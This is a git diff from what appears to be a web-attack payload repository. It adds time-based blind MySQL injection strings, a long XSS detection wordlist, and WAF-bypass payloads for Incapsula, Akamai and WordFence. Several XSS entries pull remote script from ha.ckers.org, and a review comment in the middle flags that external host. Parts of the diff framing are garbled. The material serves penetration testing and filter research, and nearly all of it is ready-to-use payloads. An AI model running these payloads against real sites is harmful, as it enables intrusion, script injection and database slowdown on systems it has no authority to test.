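+),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
+),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
+),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
+'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
+'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
+'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
+"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
+"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
+"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23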
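--- a/SQL injection/Intruders/payloads-sql-blind-MySQL-WHERE
+++ b/SQL injection/Intruders/payloads-sql-blind-MySQL-WHERE
@@ -0,0 +1,45 @@
+and 0=benchmark(3000000,MD5(1))%20/*
+and 0=benchmark(3000000,MD5(1))%20--
+and 0=benchmark(3000000,MD5(1))%20%23
+' and 0=benchmark(3000000,MD5(1))%20/*
+' and 0=benchmark(3000000,MD5(1))%20--
+' and 0=benchmark(3000000,MD5(1))%20%23
+" and 0=benchmark(3000000,MD5(1))%20/*
+" and 0=benchmark(3000000,MD5(1))%20--
+" and 0=benchmark(3000000,MD5(1))%20%23
+) and 0=benchmark(3000000,MD5(1))%20/*
+) and 0=benchmark(3000000,MD5(1))%20--
+) and 0=benchmark(3000000,MD5(1))%20%23
+)) and 0=benchmark(3000000,MD5(1))%20/*
+)) and 0=benchmark(3000000,MD5(1))%20--
+)) and 0=benchmark(3000000,MD5(1))%20%23
+))) and 0=benchmark(3000000,MD5(1))%20/*
+))) and 0=benchmark(3000000,MD5(1))%20--
+))) and 0=benchmark(3000000,MD5(1))%20%23
+)))) and 0=benchmark(3000000,MD5(1))%20/*
+)))) and 0=benchmark(3000000,MD5(1))%20--
+)))) and 0=benchmark(3000000,MD5(1))%20%23
+') and 0=benchmark(3000000,MD5(1))%20/*
+') and 0=benchmark(3000000,MD5(1))%20--
+') and 0=benchmark(3000000,MD5(1))%20%23
+") and 0=benchmark(3000000,MD5(1))%20/*
+") and 0=benchmark(3000000,MD5(1))%20--
+") and 0=benchmark(3000000,MD5(1))%20%23
+')) and 0=benchmark(3000000,MD5(1))%20/*
+')) and 0=benchmark(3000000,MD5(1))%20--
+')) and 0=benchmark(3000000,MD5(1))%20%23
+")) and 0=benchmark(3000000,MD5(1))%20/*
+")) and 0=benchmark(3000000,MD5(1))%20--
+")) and 0=benchmark(3000000,MD5(1))%20%23
+'))) and 0=benchmark(3000000,MD5(1))%20/*
+'))) and 0=benchmark(3000000,MD5(1))%20--
+'))) and 0=benchmark(3000000,MD5(1))%20%23
+"))) and 0=benchmark(3000000,MD5(1))%20/*
+"))) and 0=benchmark(3000000,MD5(1))%20--
+"))) and 0=benchmark(3000000,MD5(1))%20%23
+')))) and 0=benchmark(3000000,MD5(1))%20/*
+')))) and 0=benchmark(3000000,MD5(1))%20--
+')))) and 0=benchmark(3000000,MD5(1))%20%23
+")))) and 0=benchmark(3000000,MD5(1))%20/*
+")))) and 0=benchmark(3000000,MD5(1))%20--
+")))) and 0=benchmark(3000000,MD5(1))%20%23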
202
XSS injection/Intruders/XSSDetection.txt
Normal file
@ -0,0 +1,202 @@
|
|||||||
|
%3Cimg/src=%3Dx+onload=alert(2)%3D
|
||||||
|
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
|
||||||
|
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000EB)%3C/script%3E
|
||||||
|
48e71%3balert(1)//503466e3
|
||||||
|
';confirm('XSS')//1491b2as
|
||||||
|
a29b1%3balert(888)//a62b7156d82
|
||||||
|
<scr	ipt>alert('XSS')</scr	ipt>
|
||||||
|
"onmouseover%3dprompt(941634)
|
||||||
|
%f6%22%20onmouseover%3dprompt(941634)%20
|
||||||
|
" onerror=alert()1 a="
|
||||||
|
style=xss:expression(alert(1))
|
||||||
|
<input type=text value=“XSS”>
|
||||||
|
A” autofocus onfocus=alert(“XSS”)//
|
||||||
|
<input type=text value=”A” autofocus onfocus=alert(“XSS”)//”>
|
||||||
|
<a href="javascript:alert(1)">ssss</a>
|
||||||
|
+ADw-p+AD4-Welcome to UTF-7!+ADw-+AC8-p+AD4-
|
||||||
|
+ADw-script+AD4-alert(+ACc-utf-7!+ACc-)+ADw-+AC8-script+AD4-
|
||||||
|
+ADw-script+AD4-alert(+ACc-xss+ACc-)+ADw-+AC8-script+AD4-
|
||||||
|
<%00script>alert(‘XSS’)<%00/script>
|
||||||
|
<%script>alert(‘XSS’)<%/script>
|
||||||
|
<%tag style=”xss:expression(alert(‘XSS’))”>
|
||||||
|
<%tag onmouseover="(alert('XSS'))"> is invalid. <%br />
|
||||||
|
</b style="expr/**/ession(alert('vulnerable'))">
|
||||||
|
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||||
|
'';!--"<XSS>=&{()}
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||||
|
<IMG SRC="javascript:alert('XSS');">
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||||
|
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||||
|
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||||
|
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
<IMG SRC="jav ascript:alert('XSS');">
|
||||||
|
<IMG SRC="jav	ascript:alert('XSS');">
|
||||||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
||||||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
||||||
|
<IMG SRC="  javascript:alert('XSS');">
|
||||||
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||||
|
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
|
||||||
|
<SCRIPT SRC=//ha.ckers.org/.j>
|
||||||
|
<iframe src=http://ha.ckers.org/scriptlet.html <
|
||||||
|
<IMG SRC="javascript:alert('XSS')"
|
||||||
|
<SCRIPT>a=/XSS/
|
||||||
|
alert(a.source)</SCRIPT>
|
||||||
|
\";alert('XSS');//
|
||||||
|
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
||||||
|
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||||
|
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||||
|
<BODY ONLOAD=alert('XSS')>
|
||||||
|
<IMG DYNSRC="javascript:alert('XSS')">
|
||||||
|
<IMG LOWSRC="javascript:alert('XSS')">
|
||||||
|
<BGSOUND SRC="javascript:alert('XSS');">
|
||||||
|
<BR SIZE="&{alert('XSS')}">
|
||||||
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||||
|
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||||
|
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||||||
|
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||||
|
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||||||
|
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||||
|
<XSS STYLE="behavior: url(xss.htc);">
|
||||||
|
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
|
||||||
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||||
|
¼script¾alert(¢XSS¢)¼/script¾
|
||||||
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||||
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||||
|
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||||
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||||
|
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||||
|
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||||
|
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
|
||||||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||||
|
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
||||||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||||
|
<DIV STYLE="width: expression(alert('XSS'));">
|
||||||
|
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||||
|
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||||
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||||
|
exp/*<A STYLE='no\xss:noxss("*//*");
|
||||||
|
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
||||||
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||||
|
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||||
|
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||||
|
<!--[if gte IE 4]>
|
||||||
|
<SCRIPT>alert('XSS');</SCRIPT>
|
||||||
|
<![endif]-->
|
||||||
|
<BASE HREF="javascript:alert('XSS');//">
|
||||||
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||||
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||||
|
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
||||||
|
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
|
||||||
|
a="get";
|
||||||
|
b="URL(\"";
|
||||||
|
c="javascript:";
|
||||||
|
d="alert('XSS');\")";
|
||||||
|
eval(a+b+c+d);
|
||||||
|
<HTML xmlns:xss>
|
||||||
|
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
|
||||||
|
<xss:xss>XSS</xss:xss>
|
||||||
|
</HTML>
|
||||||
|
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
||||||
|
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||||
|
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
|
||||||
|
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
|
||||||
|
<XML SRC="xsstest.xml" ID=I></XML>
|
||||||
|
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||||
|
<HTML><BODY>
|
||||||
|
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
|
||||||
|
<?import namespace="t" implementation="#default#time2">
|
||||||
|
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
|
||||||
|
</BODY></HTML>
|
||||||
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||||
|
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||||
|
<? echo('<SCR)';
|
||||||
|
echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
||||||
|
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||||
|
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||||
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
|
||||||
|
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
|
||||||
|
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
|
||||||
|
<
|
||||||
|
%3C
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
\x3c
|
||||||
|
\x3C
|
||||||
|
\u003c
|
||||||
|
\u003C
|
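Review bot: Many entries in this list load script, CSS, HTC or SWF resources from `http://ha.ckers.org/…`, a third-party host that neither this project nor the person running a test controls. If one of these strings renders in a browser during an assessment, that browser fetches and may execute whatever the domain serves at that time. Replacing the host with a clearly labelled placeholder such as `http://YOUR-TEST-HOST.example/xss.js` would keep every external fetch on infrastructure the tester owns. Several entries also carry typographic quotes (`value=“XSS”`, `alert(‘XSS’)`), which look like word-processor artefacts rather than intended characters and are worth confirming against the original source. Finally, a few samples span several lines (the `<!--[if gte IE 4]>` block and the `a="get"; … eval(a+b+c+d);` block), which a line-oriented wordlist loader will split into unrelated fragments.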
@ -754,12 +754,24 @@ anythinglr00</script><script>alert(document.domain)</script>uxldz
|
|||||||
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
||||||
```
|
```
|
||||||
|
|
||||||
### Akamai WAF bypass by @zseano - 18th june
|
### Incapsula WAF Bypass - 11th september
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Akamai WAF Bypass by @zseano - 18th june
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
?"></script><base%20c%3D=href%3Dhttps:\mysite>
|
?"></script><base%20c%3D=href%3Dhttps:\mysite>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### WordFence WAF Bypass by @brutelogic - 12th september
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
<a href=javascript:alert(1)>
|
||||||
|
```
|
||||||
|
|
||||||
## More fun
|
## More fun
|
||||||
|
|
||||||
This section will be used for the "fun/interesting/useless" stuff.
|
This section will be used for the "fun/interesting/useless" stuff.
|
||||||
|